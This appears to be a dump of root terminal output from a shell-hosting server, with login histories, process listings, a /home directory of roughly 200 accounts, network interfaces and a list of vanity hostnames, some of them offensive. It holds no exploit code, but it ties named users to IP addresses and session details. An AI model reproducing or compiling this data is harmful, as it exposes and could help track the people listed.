+apo              ttyp6    75.158.79.102    Wed Jun  3 12:20 - 12:54  (00:33)
+blkgraz          ttyp2    70.104.27.82     Wed Jun  3 12:01 - 19:16 (2+07:15)
+smash            ttyp2    ntora.eml.ee     Tue Jun  2 21:03 - 22:35  (01:32)
+kruapra          ttyp2    75.80.56.213     Tue Jun  2 20:05 - 20:35  (00:30)
+katsst           ttyp6    76.240.177.107   Tue Jun  2 14:30 - 15:00  (00:30)
+blkgraz          ttyp6    71.252.210.34    Tue Jun  2 10:39 - 11:36  (00:57)
+blkgraz          ttyp2    71.252.210.34    Tue Jun  2 09:51 - 18:17  (08:26)
+crrj13           ttyp2    24.23.247.110    Mon Jun  1 23:54 - 00:00  (00:06)
+crrj13           ttyp2    69.3.47.203      Mon Jun  1 23:19 - 23:32  (00:13)
+redrum           ttyp6    ist.kuscheli.ch  Mon Jun  1 13:49 - 14:11  (00:21)
+blkgraz          ttyp2    71.252.210.34    Mon Jun  1 12:26 - 23:19  (10:53)
+lordy            ttyp2    76.108.112.60    Mon Jun  1 06:20 - 06:21  (00:01)
+
+
+[root@velocity:~]# ps -aux | grep romeo
+root       83591  0.0  0.2  5400  2068  ??  Is    9:16AM   0:00.38 sshd: romeo [priv] (sshd)
+romeo      83595  0.0  0.2  5384  2120  ??  S     9:16AM   0:04.62 sshd:  (sshd)
+root       32336  0.0  0.1  1592   892  p2  S+    7:39PM   0:00.00 grep romeo
+romeo      20712  0.0  0.1  3272  1248  p9  Is   Wed06AM   0:00.13 /usr/local/bin/bash
+romeo      66004  0.0  0.7 10124  6844  p9  S+   Sat10AM   2:07.98 irssi -h absolute.ownage.net
+romeo      24414  0.0  0.1  2040  1444  pf  S+    4:23PM   0:00.04 screen -r
+romeo      83597  0.0  0.2  3240  1868  pf  Is    9:16AM   0:00.04 -bash (bash)
+[root@velocity:~]# 
+
+[root@velocity:~]# ps -aux | grep pimpinjg
+root       82323  0.0  0.2  5400  2120  ??  Is    8:47AM   0:00.07 sshd: pimpinjg [priv] (sshd)
+pimpinjg   82325  0.0  0.2  5384  2128  ??  I     8:47AM   0:00.35 sshd: pimpinjg@ttypd (sshd)
+root       32340  0.0  0.1  1548   880  p2  R+    7:39PM   0:00.00 grep pimpinjg
+pimpinjg   29257  0.0  0.1  2040  1444  pd  S+    6:20PM   0:00.03 screen -r
+pimpinjg   82327  0.0  0.2  3232  1844  pd  Is    8:47AM   0:00.03 -bash (bash)
+pimpinjg   20846  0.0  0.2  3268  1856  pe  Is    9:24PM   0:00.05 /usr/local/bin/bash
+pimpinjg   82595  0.0  0.7 10476  7720  pe  S+    8:52AM   0:16.87 irssi -h 72.20.28.206
+
+
+[root@velocity:/home]# ls -la
+total 820
+drwx--x--x  204 root         wheel        3584 Jun 17 18:30 ./
+drwxr-xr-x   24 root         wheel         512 Jun 15 07:35 ../
+drwxr-xr-x    4 ac1115       ac1115        512 Jul 10  2008 ac1115/
+drwxr-xr-x    4 burnt        burnt         512 Apr 22  2005 ad/
+drwxr-xr-x    3 nek0o        nek0o         512 Feb 26  2007 adro/
+drwxr-xr-x    3 alexbb       alexbb        512 Jun  8 23:27 alexbb/
+drwxr-xr-x    2 anux         anux          512 Feb 12  2008 anux/
+drwxr-xr-x    6 apo          apo           512 Sep 28  2008 apo/
+drwxr-xr-x    5 1162         1162          512 Mar  7  2007 arcade/
+drwxr-xr-x    2 asriel       asriel        512 Jun  6 07:37 asriel/
+drwxr-xr-x    6 athemp       athemp        512 Aug  6  2007 athemp/
+drwxr-xr-x    2 daali        daali         512 Mar  1  2005 badwolf/
+drwxr-xr-x    3 baxxta       baxxta        512 Jul 22  2008 baxxta/
+drwxr-xr-x    2 bbblade1     bbblade1      512 Jan 15  2008 bbblade1/
+drwxr-xr-x    7 1154         1154          512 Oct  9  2005 biffter/
+drwxr-xr-x    3 blake96      blake96       512 Dec  9  2008 blake96/
+drwxr-xr-x    2 1033         1033          512 Mar  1  2005 blazin/
+drwxr-xr-x    5 blkgraz      blkgraz       512 Mar 30 23:25 blkgraz/
+drwxr-xr-x    7 blotch       blotch        512 Dec 14  2008 blotch/
+drwxr-xr-x    9 bluewish     bluewish      512 Apr 13 10:40 bluewish/
+drwxr-xr-x    4 methanl      methanl       512 Apr 11  2007 blunted/
+drwxr-xr-x    2 bnoel        bnoel         512 Dec  5  2007 bnoel/
+drwxr-xr-x   14 bollox       bollox       1024 Feb 18  2008 bollox/
+drwxr-xr-x    4 1146         1146          512 Jul  6  2005 boxing/
+drwxr-xr-x    3 bpunux       bpunux        512 Oct 31  2008 bpunux/
+drwxr-xr-x    2 brex132      brex132       512 Jun  7 12:29 brex132/
+drwxr-xr-x    2 brosb4       brosb4        512 Nov 26  2008 brosb4/
+drwxr-xr-x    6 brosco       brosco        512 Mar 22 06:08 brosco/
+drwxr-xr-x    5 bruhaha      bruhaha       512 Aug 12  2008 bruhaha/
+drwxr-xr-x    5 1226         1226          512 Nov 23  2006 bubba01/
+drwxr-xr-x   13 burnt        burnt        1024 Mar 24  2008 burnt/
+drwxr-xr-x    4 1117         1117          512 Mar 18  2005 c00ps/
+drwxr-xr-x    3 1048         1048          512 Apr 20  2007 cake/
+drwxr-xr-x    5 cappy57      cappy57       512 Jul 13  2007 cappy57/
+drwxr-xr-x    4 cassand      cassand       512 Mar 19 14:35 cassand/
+drwxr-xr-x    5 cazz1961     cazz1961      512 Apr 14 17:23 cazz1961/
+drwxr-xr-x    6 ceejay       ceejay        512 Nov 23  2007 ceejay/
+drwxr-xr-x    8 chaos1       chaos1       1024 Feb  6 15:26 chaos1/
+drwxr-xr-x    6 1251         1251          512 Mar  9  2007 chatnet/
+drwxr-xr-x    6 comedy       comedy        512 Jan 20  2007 cheazey/
+drwxr-xr-x    5 chevym4n     chevym4n      512 Nov 23  2008 chevym4n/
+drwxr-xr-x    3 chozen1      chozen1       512 Jan 26 19:31 chozen1/
+drwxr-xr-x    5 chrirc       chrirc        512 Jun 12  2008 chrirc/
+drwxr-xr-x    2 chrisdad     chrisdad      512 Dec 18  2008 chrisdad/
+drwxr-xr-x    2 chriys       chriys        512 Dec  3  2008 chriys/
+drwxr-xr-x    7 1085         1085          512 Feb 11  2007 cloudy1/
+drwxr-xr-x    7 cmm          cmm          1024 May  9 07:01 cmm/
+drwxr-xr-x    2 comedy       comedy        512 May 22  2008 comedy/
+drwxr-xr-x    3 cont         cont          512 Jan 11 18:13 cont/
+drwxr-xr-x    2 coolcat      coolcat       512 Mar 18  2008 coolcat/
+drwxr-xr-x    2 corley       corley        512 May 12  2008 corley/
+drwx--x--x    9 cpu          cpu          1024 Apr 14 15:23 cpu/
+drwxr-xr-x   13 crash        crash        1024 Feb 19 20:40 crash/
+drwxr-xr-x    7 crazie       crazie        512 Nov 26  2007 crazie/
+drwxr-xr-x    8 crazyl       crazyl       1024 Apr 13  2007 crazyl/
+drwxr-xr-x   23 crrj13       crrj13       1536 Mar 23 17:27 crrj13/
+drwxr-xr-x    9 1159         1159          512 Sep  5  2005 d3vil/
+drwxrwxrwx    8 daali        daali         512 Mar 11  2008 daali/
+drwxr-xr-x    7 dano30       dano30        512 Apr 12  2007 dano30/
+drwxr-xr-x    4 darien9      darien9      1536 Oct 31  2008 darien9/
+drwxr-xr-x    7 dark         dark          512 Sep  3  2007 dark/
+drwxr-xr-x    6 darkevil     darkevil      512 Mar 25  2008 darkevil/
+drwxr-xr-x    5 darkuno3     darkuno3      512 Mar 10 10:27 darkuno3/
+drwxr-xr-x    2 dasboot      dasboot       512 Mar 13 13:55 dasboot/
+drwx------   11 1093         1093          512 Feb  5  2006 dave/
+drwxr-xr-x    7 dealer       dealer        512 Feb 25 01:01 dealer/
+drwxr-xr-x    6 1123         1123          512 Mar  1  2007 deathbal/
+drwxr-xr-x    2 delion1      delion1       512 Feb 22 16:51 delion1/
+drwxr-xr-x    3 cazz1961     cazz1961      512 Mar  1  2005 denial/
+drwxr-xr-x    5 devil        devil         512 May 22 10:21 devil/
+drwxr-xr-x    3 sqd          sqd           512 Dec  4  2006 digital/
+drwxr-xr-x    8 digitalman   digitalman    512 May 20 14:26 digitalman/
+drwxr-xr-x    5 1176         1176          512 Jan 16  2007 dizzle/
+drwxr-xr-x    3 djkarl       djkarl        512 Jan 10 12:23 djkarl/
+drwxr-xr-x    2 djspark      djspark       512 Jun 24  2008 djspark/
+drwxr-xr-x    7 chrirc       chrirc        512 Jan  6  2007 doomed/
+drwxr-xr-x    8 dravas       dravas       1024 Sep 29  2007 dravas/
+drwxr-xr-x    2 dv327        dv327         512 Apr  8  2007 drk9/
+drwxr-xr-x    5 1259         1259          512 Apr 11  2007 dust/
+drwxr-xr-x    3 dv327        dv327         512 Aug  9  2008 dv327/
+drwxr-xr-x    8 edgein       edgein        512 Feb 13  2008 edgein/
+drwxr-xr-x    8 en0prcv      en0prcv       512 Apr 14  2007 en0prcv/
+drwxr-xr-x    4 evino        evino         512 Jan 18  2006 evino/
+drwxr-xr-x    7 blkgraz      blkgraz       512 Mar  1  2005 evino2k5/
+drwxr-xr-x    4 root         wheel         512 Apr 12  2007 execute/
+drwxr-xr-x    3 f3d0r        f3d0r         512 Jul 31  2007 f3d0r/
+drwxr-xr-x    2 feed         feed          512 Aug 21  2008 feed/
+drwxr-xr-x    4 genosyde     genosyde      512 Jan 27 18:18 genosyde/
+drwxr-xr-x    2 grindey      grindey       512 Mar 25  2008 grindey/
+drwxr-xr-x    2 groove       groove        512 Apr 12  2007 groove/
+drwxr-xr-x    5 grumpy       grumpy        512 Feb  4 18:06 grumpy/
+drwxr-xr-x    4 hh360        hh360         512 May 19  2008 hh360/
+drwxr-xr-x    2 hixk         hixk          512 Nov 24  2008 hixk/
+drwxr-xr-x    3 howell1      howell1       512 May 29 20:39 howell1/
+drwxr-xr-x   12 hts          hts          1024 Jun 20 20:58 hts/
+drwxr-xr-x    2 hw4tbnc      hw4tbnc       512 May 11  2008 hw4tbnc/
+drwxr-xr-x    4 ioplex       ioplex        512 May  8 20:16 ioplex/
+drwxr-xr-x    6 ircjaymz     ircjaymz      512 Mar 18  2008 ircjaymz/
+drwxr-xr-x    2 ircusr       ircusr        512 Jan 20 17:49 ircusr/
+drwxr-xr-x    2 itzkorn      itzkorn       512 Apr 12  2007 itzkorn/
+drwxr-xr-x    2 izedd        izedd         512 Oct  9  2007 izedd/
+drwxr-xr-x    2 jaiven       jaiven        512 Feb 16 17:08 jaiven/
+drwxr-xr-x    4 jamesn       jamesn        512 May 31  2007 jamesn/
+drwxr-xr-x    8 jax66        jax66        1024 May 14 16:03 jax66/
+drwxr-xr-x    2 jerryste     jerryste      512 Dec 28 14:19 jerryste/
+-rw-r--r--    1 root         wheel           0 Oct  5  2007 jj.log
+drwxr-xr-x    2 jschultk     jschultk      512 May 31  2007 jschultk/
+drwxr-xr-x    2 jtracy       jtracy        512 Dec  3  2008 jtracy/
+drwxr-xr-x    2 katsst       katsst        512 Apr 12  2007 katsst/
+drwxr-xr-x   15 khicks       khicks       1024 Jan  2  2008 khicks/
+drwxr-xr-x    2 kingzy       kingzy        512 Feb 22 16:50 kingzy/
+drwxr-xr-x    4 kokoryu      kokoryu       512 Feb  1 16:54 kokoryu/
+drwxr-xr-x    2 kooner       kooner        512 Mar 24 17:34 kooner/
+drwxr-xr-x    2 kruapra      kruapra       512 Jan  1  2008 kruapra/
+drwxr-xr-x    2 ksafusi      ksafusi       512 Jan 29  2008 ksafusi/
+drwxr-xr-x    2 l33t         l33t          512 Apr 12  2007 l33t/
+drwxr-xr-x    2 lailoke      lailoke       512 Mar 11 22:12 lailoke/
+drwxr-xr-x    9 lordy        lordy         512 May 17 04:05 lordy/
+drwxr-xr-x    8 ltootle      ltootle       512 Jun 10  2008 ltootle/
+drwxr-xr-x   15 lyhne1       lyhne1       1024 May 25 23:00 lyhne1/
+drwxr-xr-x    6 lymelyte     lymelyte      512 Mar 29 14:18 lymelyte/
+drwxr-xr-x    3 lynx         lynx          512 May 28  2008 lynx/
+drwxr-xr-x    2 mae21        mae21         512 Mar  8 21:02 mae21/
+drwxr-xr-x    5 manboo       manboo        512 Jul  7  2008 manboo/
+drwxr-xr-x    3 matt         matt          512 Jun 20 19:25 matt/
+drwxr-xr-x    2 methanl      methanl       512 Feb  5  2008 methanl/
+drwxr-xr-x    6 mimik0r      mimik0r       512 May 20  2008 mimik0r/
+drwxr-xr-x    2 mindben      mindben       512 Nov 24  2008 mindben/
+drwxr-xr-x    7 mlh          mlh           512 Apr  8 01:12 mlh/
+drwxr-xr-x    3 mogle3       mogle3        512 Apr  8 12:06 mogle3/
+drwxr-xr-x    3 mooo         mooo          512 May 21 20:50 mooo/
+drwxr-xr-x    5 mrts         mrts          512 Mar 18 01:51 mrts/
+drwxr-xr-x    9 narcissu     narcissu      512 Feb  2  2008 narcissu/
+drwxr-xr-x    7 nardi        nardi         512 Mar 24 10:55 nardi/
+drwxr-xr-x    3 nek0o        nek0o         512 Jul 21  2008 nek0o/
+drwxr-xr-x    3 neohax       neohax        512 Jun 13  2007 neohax/
+drwxr-xr-x    3 nexxtea      nexxtea       512 Apr 19  2007 nexxtea/
+drwxr-xr-x    9 nodex        nodex         512 Sep  5  2007 nodex/
+drwxr-xr-x    2 nsc          wheel         512 Apr 12  2007 nsc/
+drwxr-xr-x    3 nyakz        nyakz         512 Mar 13 20:13 nyakz/
+drwxr-xr-x    9 oby1         oby1          512 Feb 13  2008 oby1/
+drwxr-xr-x   21 omelette     omelette     1024 Jun  1  2008 omelette/
+drwxr-xr-x    2 omen         omen          512 Nov 24  2008 omen/
+drwxr-xr-x    5 omgwtf       omgwtf        512 Apr 27 03:17 omgwtf/
+drwxr-xr-x    5 owine        owine         512 Apr 21  2008 owine/
+drwxr-xr-x    6 own3d        own3d         512 Oct 15  2008 own3d/
+drwxr-xr-x    5 paleride     paleride      512 Jan 27 17:55 paleride/
+drwxr-xr-x    2 pbx          pbx           512 Dec 28 14:22 pbx/
+drwxr-xr-x    2 percott1     percott1      512 Jun 24  2008 percott1/
+drwxr-xr-x    8 pimpinjg     pimpinjg      512 Jun 23 07:20 pimpinjg/
+drwxr-xr-x    4 poolboy      poolboy       512 Aug 29  2007 poolboy/
+drwxr-xr-x    3 prodigy      prodigy       512 May 30  2008 prodigy/
+drwxr-xr-x    3 psycoz       psycoz        512 Jun  7 17:01 psycoz/
+drwxr-xr-x    2 qberto       qberto        512 Mar 17 12:09 qberto/
+drwxr-xr-x    7 qfx          qfx           512 Feb 17 04:54 qfx/
+drwxr-xr-x    4 quinn        quinn         512 Aug 10  2007 quinn/
+drwxr-xr-x    5 reaper90     reaper90      512 Dec  2  2007 reaper90/
+drwxr-xr-x   22 redrum       redrum       1024 Jun  9 12:49 redrum/
+drwxr-xr-x    5 reznik       reznik        512 Apr 11  2008 reznik/
+drwxr-xr-x    4 rice21       rice21        512 Dec 17  2008 rice21/
+drwxr-xr-x    4 rikt         rikt          512 Feb 17 06:27 rikt/
+drwxr-xr-x    5 romeo        romeo         512 Jun 20 02:58 romeo/ 
+drwxr-xr-x    7 roodyk       roodyk        512 Apr 26 14:04 roodyk/
+drwxr-xr-x    3 sacred       sacred        512 Jun  1  2007 sacred/
+drwxr-xr-x    3 safety       safety        512 Feb 15  2008 safety/
+drwxr-xr-x    2 sakik1       sakik1        512 Dec  3  2008 sakik1/
+drwxr-xr-x    2 sal          sal           512 Feb 16 17:17 sal/
+drwxr-xr-x    5 schlomer     schlomer      512 Aug 24  2007 schlomer/
+drwxr-xr-x    7 scouse       scouse       1536 Nov  5  2008 scouse/
+drwxr-xr-x    5 sharpie      sharpie       512 Apr 13  2007 sharpie/
+drwxr-xr-x    5 shoes        shoes         512 Mar  7 22:32 shoes/
+drwxr-xr-x    2 silver15     silver15      512 Mar 25  2008 silver15/
+drwxr-xr-x    3 simonbh      simonbh       512 Aug  9  2007 simonbh/
+drwxr-xr-x    9 sinistro     sinistro      512 Oct  5  2007 sinistro/
+drwxr-xr-x    2 skit         skit          512 Apr 12  2007 skit/
+drwxr-xr-x    6 skypilot     skypilot      512 Nov  7  2008 skypilot/
+drwxr-xr-x    5 smash        smash         512 Jun 22 01:29 smash/
+drwxr-xr-x    6 sqd          sqd           512 May  7 20:56 sqd/
+drwxr-xr-x    3 ssaws        ssaws         512 Feb  3 23:20 ssaws/
+drwxr-xr-x    4 ste          ste           512 Jun 15 12:29 ste/
+drwxr-xr-x    5 subkult      subkult       512 Feb  3 11:59 subkult/
+drwxr-xr-x    7 sysc         sysc          512 Jun 11 10:27 sysc/
+drwxr-xr-x    9 tarawa       tarawa        512 May 26 10:51 tarawa/
+drwxr-xr-x    3 tea          tea           512 Mar 16  2008 tea/
+drwxr-xr-x    5 techi3       techi3        512 Aug 29  2007 techi3/
+drwxr-xr-x    5 timgor       timgor       1024 Sep  3  2007 timgor/
+drwxr-xr-x    3 tlm          tlm           512 May  1  2007 tlm/
+drwxr-xr-x    7 vamp         vamp         1024 Nov 20  2007 vamp/
+drwxr-xr-x    2 vietnigh     vietnigh      512 Mar  8 15:31 vietnigh/
+drwxr-xr-x    3 visage       visage        512 Mar 13 15:59 visage/
+drwxr-xr-x    4 vitalrbj     vitalrbj      512 May 15  2007 vitalrbj/
+drwxr-xr-x    3 vividbreeze  vividbreeze   512 May 15  2005 vividbreeze/
+drwxr-xr-x    2 voxitize     voxitize      512 Aug 18  2008 voxitize/
+drwxr-xr-x    5 warlordz     warlordz      512 Aug 20  2007 warlordz/
+drwxr-xr-x    3 wchan21      wchan21       512 Dec 15  2008 wchan21/
+drwxr-xr-x    4 wolf         wolf          512 Aug 28  2008 wolf/
+drwxr-xr-x    2 xavi         xavi          512 Feb  1 16:56 xavi/
+drwxr-xr-x    3 xckx         xckx          512 Oct  4  2007 xckx/
+drwxr-xr-x    4 xkelsx       xkelsx        512 Dec 16  2008 xkelsx/
+drwxr-xr-x    5 y2j          y2j           512 May 15 08:42 y2j/
+drwxr-xr-x   13 yaquis       yaquis       1024 Jun 11 14:32 yaquis/
+drwxr-xr-x    8 zeepysea     zeepysea      512 Oct 21  2008 zeepysea/
+drwxr-xr-x    6 zenchi       zenchi        512 Nov 29  2007 zenchi/
+drwxr-xr-x    4 zime         zime          512 Feb 15  2008 zime/
+drwxr-xr-x    3 zoo          zoo           512 Apr 14  2007 zoo/
+[root@velocity:/home]# 
+
+
+[root@velocity:/home]# ifconfig
+bge0: flags=8843 mtu 1500
+        options=1b
+        inet 72.20.3.98 netmask 0xfffffffc broadcast 72.20.3.99
+        inet 72.20.28.193 netmask 0xffffffff broadcast 72.20.28.193
+        inet 72.20.28.194 netmask 0xffffffff broadcast 72.20.28.194
+        inet 72.20.28.195 netmask 0xffffffff broadcast 72.20.28.195
+        inet 72.20.28.196 netmask 0xffffffff broadcast 72.20.28.196
+        inet 72.20.28.197 netmask 0xffffffff broadcast 72.20.28.197
+        inet 72.20.28.198 netmask 0xffffffff broadcast 72.20.28.198
+        inet 72.20.28.199 netmask 0xffffffff broadcast 72.20.28.199
+        inet 72.20.28.200 netmask 0xffffffff broadcast 72.20.28.200
+        inet 72.20.28.201 netmask 0xffffffff broadcast 72.20.28.201
+        inet 72.20.28.202 netmask 0xffffffff broadcast 72.20.28.202
+        inet 72.20.28.203 netmask 0xffffffff broadcast 72.20.28.203
+        inet 72.20.28.204 netmask 0xffffffff broadcast 72.20.28.204
+        inet 72.20.28.205 netmask 0xffffffff broadcast 72.20.28.205
+        inet 72.20.28.206 netmask 0xffffffff broadcast 72.20.28.206
+        inet 72.20.28.207 netmask 0xffffffff broadcast 72.20.28.207
+        inet 72.20.28.208 netmask 0xffffffff broadcast 72.20.28.208
+        inet 72.20.28.209 netmask 0xffffffff broadcast 72.20.28.209
+        inet 72.20.28.210 netmask 0xffffffff broadcast 72.20.28.210
+        inet 72.20.28.211 netmask 0xffffffff broadcast 72.20.28.211
+        inet 72.20.28.212 netmask 0xffffffff broadcast 72.20.28.212
+        inet 72.20.28.213 netmask 0xffffffff broadcast 72.20.28.213
+        inet 72.20.28.214 netmask 0xffffffff broadcast 72.20.28.214
+        inet 72.20.28.215 netmask 0xffffffff broadcast 72.20.28.215
+        inet 72.20.28.216 netmask 0xffffffff broadcast 72.20.28.216
+        inet 72.20.28.217 netmask 0xffffffff broadcast 72.20.28.217
+        inet 72.20.28.218 netmask 0xffffffff broadcast 72.20.28.218
+        inet 72.20.28.219 netmask 0xffffffff broadcast 72.20.28.219
+        inet 72.20.28.220 netmask 0xffffffff broadcast 72.20.28.220
+        inet 72.20.28.221 netmask 0xffffffff broadcast 72.20.28.221
+        inet 72.20.28.222 netmask 0xffffffff broadcast 72.20.28.222
+        inet 72.20.28.223 netmask 0xffffffff broadcast 72.20.28.223
+        inet 72.20.28.224 netmask 0xffffffff broadcast 72.20.28.224
+        inet 72.20.28.225 netmask 0xffffffff broadcast 72.20.28.225
+        inet 72.20.28.226 netmask 0xffffffff broadcast 72.20.28.226
+        inet 72.20.28.227 netmask 0xffffffff broadcast 72.20.28.227
+        inet 72.20.28.228 netmask 0xffffffff broadcast 72.20.28.228
+        inet 72.20.28.229 netmask 0xffffffff broadcast 72.20.28.229
+        inet 72.20.28.230 netmask 0xffffffff broadcast 72.20.28.230
+        inet 72.20.28.231 netmask 0xffffffff broadcast 72.20.28.231
+        inet 72.20.28.232 netmask 0xffffffff broadcast 72.20.28.232
+        inet 72.20.28.233 netmask 0xffffffff broadcast 72.20.28.233
+        inet 72.20.28.234 netmask 0xffffffff broadcast 72.20.28.234
+        inet 72.20.28.235 netmask 0xffffffff broadcast 72.20.28.235
+        inet 72.20.28.236 netmask 0xffffffff broadcast 72.20.28.236
+        inet 72.20.28.237 netmask 0xffffffff broadcast 72.20.28.237
+        inet 72.20.28.238 netmask 0xffffffff broadcast 72.20.28.238
+        inet 72.20.28.239 netmask 0xffffffff broadcast 72.20.28.239
+        inet 72.20.28.240 netmask 0xffffffff broadcast 72.20.28.240
+        inet 72.20.28.241 netmask 0xffffffff broadcast 72.20.28.241
+        inet 72.20.28.242 netmask 0xffffffff broadcast 72.20.28.242
+        inet 72.20.28.243 netmask 0xffffffff broadcast 72.20.28.243
+        inet 72.20.28.244 netmask 0xffffffff broadcast 72.20.28.244
+        inet 72.20.28.245 netmask 0xffffffff broadcast 72.20.28.245
+        inet 72.20.28.246 netmask 0xffffffff broadcast 72.20.28.246
+        inet 72.20.28.247 netmask 0xffffffff broadcast 72.20.28.247
+        inet 72.20.28.248 netmask 0xffffffff broadcast 72.20.28.248
+        inet 72.20.28.249 netmask 0xffffffff broadcast 72.20.28.249
+        inet 72.20.28.250 netmask 0xffffffff broadcast 72.20.28.250
+        inet 72.20.28.251 netmask 0xffffffff broadcast 72.20.28.251
+        inet 72.20.28.252 netmask 0xffffffff broadcast 72.20.28.252
+        inet 72.20.28.253 netmask 0xffffffff broadcast 72.20.28.253
+        inet 72.20.28.254 netmask 0xffffffff broadcast 72.20.28.254
+        ether 00:11:11:cc:09:63
+        media: Ethernet 10baseT/UTP 
+        status: active
+lo0: flags=8049 mtu 16384
+        inet6 fe80::1%lo0 prefixlen 64 scopeid 0x2 
+        inet6 ::1 prefixlen 128 
+        inet 127.0.0.1 netmask 0xff000000 
+[root@velocity:/home]# 
+
+
+[root@velocity:/usr/home]# cat /bin/vhosts 
+#!/usr/local/bin/bash
+echo "
+
+          _   __/ /_  ____  _____/ /______
+         | | / / __ \/ __ \/ ___/ __/ ___/
+         | |/ / / / / /_/ (__  ) /_(__  )
+         |___/_/ /_/\____/____/\__/____/
+           www.vitalspeeds.com/vhosts
+
+72.20.3.98 -\> .
+72.20.28.193 -\> scaring.us.
+72.20.28.194 -\> .
+72.20.28.195 -\> George.W.Bush.is.scaring.us.
+72.20.28.196 -\> l33t.hax0rs.are.scaring.us.
+72.20.28.197 -\> your.mom.is.scaring.us.
+72.20.28.198 -\> irc.isidling.net.
+72.20.28.199 -\> everyone.isalways.idling.net.
+72.20.28.200 -\> just.idling.net.
+72.20.28.201 -\> the.mpaa.keeps.scaring.us.
+72.20.28.202 -\> the.riaa.keeps.scaring.us.
+72.20.28.203 -\> defaultxbe.com.
+72.20.28.204 -\> ownage.net.
+72.20.28.205 -\> absolute.ownage.net.
+72.20.28.206 -\> complete.ownage.net.
+72.20.28.207 -\> is.the.godofgods.net.
+72.20.28.208 -\> fatblunts.com.
+72.20.28.209 -\> will.work.for.fatblunts.com.
+72.20.28.210 -\> smokes.fatblunts.com.
+72.20.28.211 -\> rolls.fatblunts.com.
+72.20.28.212 -\> fuckdapolice.com.
+72.20.28.213 -\> killed.my.wife.and.said.fuckdapolice.com.
+72.20.28.214 -\> owned.nasa.and.said.fuckdapolice.com.
+72.20.28.215 -\> playah.org.
+72.20.28.216 -\> big.time.playah.org.
+72.20.28.217 -\> still.a.playah.org.
+72.20.28.218 -\> the.original.playah.org.
+72.20.28.219 -\> shitsngiggles.net.
+72.20.28.220 -\> packeted.gov.for.shitsngiggles.net.
+72.20.28.221 -\> us-govt.info.
+72.20.28.222 -\> has.topsecret.us-govt.info.
+72.20.28.223 -\> steals.us-govt.info.
+72.20.28.224 -\> packets.the.us-govt.info.
+72.20.28.225 -\> oblivion.globalwar.net.
+72.20.28.226 -\> started.a.globalwar.net.
+72.20.28.227 -\> irc.sith-net.com.
+72.20.28.228 -\> i.am.away.idling.net.
+72.20.28.229 -\> you.got.schooled.org.
+72.20.28.230 -\> wonders.why.arabs.like.to.fuck.withthe.us.
+72.20.28.231 -\> dont.fuck.withthe.us.
+72.20.28.232 -\> stole.your-ip.info.
+72.20.28.233 -\> has.your-ip.info.
+72.20.28.234 -\> overflo.ws.
+72.20.28.235 -\> your.mom.needs.a.tampon.before.she.overflo.ws.
+72.20.28.236 -\> buffer.overflo.ws.
+72.20.28.237 -\> got.hacked.by.buffer.overflo.ws.
+72.20.28.238 -\> the.toilet.overflo.ws.
+72.20.28.239 -\> i.made.the.hoover.dam.overflo.ws.
+72.20.28.240 -\> i.am.teh.antidr.ug.
+72.20.28.241 -\> irc.cheazey.net.
+72.20.28.242 -\> staff.vitalspeeds.com.
+72.20.28.243 -\> oper.idlenetworks.net.
+72.20.28.244 -\> .
+72.20.28.245 -\> .
+72.20.28.246 -\> .
+72.20.28.247 -\> .
+72.20.28.248 -\> .
+72.20.28.249 -\> .
+72.20.28.250 -\> .
+72.20.28.251 -\> .
+72.20.28.252 -\> .
+72.20.28.253 -\> cyberia.is.scaring.us.
+72.20.28.254 -\> anarchy.fuckdapolice.com.
+"
+
+
+[root@velocity:~]# last root
+
+wtmp begins Mon Jun  1 06:20:11 CDT 2009
+[root@velocity:~]# last romeo
+romeo            ttypg    188.49.118.210   Wed Jun 17 18:35 - 18:35  (00:00)
+
+wtmp begins Mon Jun  1 06:20:11 CDT 2009
+[root@velocity:~]# last pimpinjg
+pimpinjg         ttyp2    cpe-76-175-20-18 Wed Jun 24 07:29 - 07:51  (00:22)
+pimpinjg         ttyp2    cpe-76-175-20-18 Wed Jun 24 05:47 - 06:44  (00:56)
+pimpinjg         ttyp3    cpe-76-175-20-18 Wed Jun 24 05:41 - 05:46  (00:05)
+pimpinjg         ttyp3    cpe-76-175-20-18 Wed Jun 24 05:40 - 05:41  (00:00)
+pimpinjg         ttyp1    cpe-76-175-20-18 Wed Jun 24 05:30 - 05:41  (00:10)
+pimpinjg         ttyp1    cpe-76-175-20-18 Wed Jun 24 04:32 - 04:35  (00:02)
+pimpinjg         ttyp3    cpe-76-175-20-18 Tue Jun 23 20:54 - 20:54  (00:00)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:51 - 08:51  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:47 - 20:53  (12:06)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:42  (00:05)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:37 - 08:43  (00:06)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 08:36 - 08:36  (00:00)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 07:19 - 08:32  (01:12)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:15 - 08:36  (01:20)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:12 - 07:13  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 07:11 - 07:12  (00:00)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 05:20 - 05:20  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 04:59 - 07:10  (02:10)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:43 - 04:25  (00:42)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 03:10 - 03:10  (00:00)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:52 - 02:59  (00:07)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 02:37 - 02:38  (00:01)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:26 - 01:28  (00:01)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:16 - 01:17  (00:01)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 01:15 - 01:43  (00:28)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:11 - 01:14  (00:02)
+pimpinjg         ttypf    cpe-76-175-20-18 Tue Jun 23 01:02 - 01:07  (00:04)
+pimpinjg         ttypd    cpe-76-175-20-18 Tue Jun 23 00:45 - 01:14  (00:28)
